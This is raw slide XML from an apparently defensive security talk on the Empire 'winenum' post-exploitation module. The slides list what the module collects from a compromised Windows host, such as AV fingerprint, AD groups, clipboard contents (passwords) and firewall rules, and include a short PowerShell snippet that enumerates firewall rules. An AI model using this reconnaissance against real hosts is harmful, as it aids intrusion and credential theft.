              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>AD group memberships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Last 5 files opened</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Interesting Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clipboard contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Available Shares</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02276E17-C4DA-40EB-AF07-E0C11B74C827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1597543" y="1236471"/>
            <a:ext cx="8996909" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Empire Module:      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>situational_awareness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/host/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winenum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{667E8962-D9B3-458E-B749-A0A100D1FAC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6897061" y="4122928"/>
            <a:ext cx="5556740" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ever copy/pasted a password?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arrow: Left 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71EBA6C3-BB75-4A34-AC5A-4A9AC7D809AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5621212" y="4255477"/>
            <a:ext cx="949570" cy="75262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1150981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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-97136"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Winenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pt.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DAE3BF9-06B8-45FD-8FEA-E4C57595B790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351746" y="2057651"/>
            <a:ext cx="11488501" cy="4216539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outputs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>AV Fingerprint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Windows last update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Network Adapters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Established Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Mapped Drives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Firewall Rules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED28CA4-651A-438C-91CF-150196C126A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1597543" y="1236471"/>
            <a:ext cx="8996909" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Empire Module:      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>situational_awareness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/host/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winenum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1065961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8000" b="-8000"/>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5716A70-E975-4EAE-8BA5-A797DF51CD4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356860" y="597878"/>
            <a:ext cx="6835140" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="dk1">
              <a:alpha val="71000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>“In order to effectively defend ourselves we need to understand how attacks occur.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29415755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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-97136"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Winenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pt.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DAE3BF9-06B8-45FD-8FEA-E4C57595B790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351746" y="2057651"/>
            <a:ext cx="11488501" cy="4216539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outputs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>AV Fingerprint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Windows last update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Network Adapters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Established Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Mapped Drives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall Rules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED28CA4-651A-438C-91CF-150196C126A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1597543" y="1236471"/>
            <a:ext cx="8996909" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Empire Module:      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>situational_awareness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/host/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winenum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arrow: Left 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1384CF-9F24-4676-B9A2-5157CB010494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3926054" y="5521568"/>
            <a:ext cx="2169945" cy="75262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3363573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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-97136"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall Rules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DAE3BF9-06B8-45FD-8FEA-E4C57595B790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351748" y="1708316"/>
            <a:ext cx="11488501" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Creates a firewall COM Object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enumerates the firewall object for all rules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64354EC6-EC56-401E-B497-DEB60CD7BD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429065" y="5772251"/>
            <a:ext cx="9179170" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://blogs.technet.microsoft.com/heyscriptingguy/2010/07/03/hey-scripting-guy-weekend-scripter-how-to-retrieve-enabled-windows-firewall-rules/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F7539FC-590D-4FB9-8801-F3EC650BEAC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1913205" y="2481049"/>
            <a:ext cx="7934180" cy="947951"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>fw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> = New-Object -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ComObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> HNetCfg.FwPolicy2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>FirewallRules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>fw.rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A3B5B76-8822-46CB-B2DA-A52325A9E43F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1913206" y="4345648"/>
            <a:ext cx="7934180" cy="880500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>fwrules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ForEach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-Object {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>	get all the things }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196768300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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
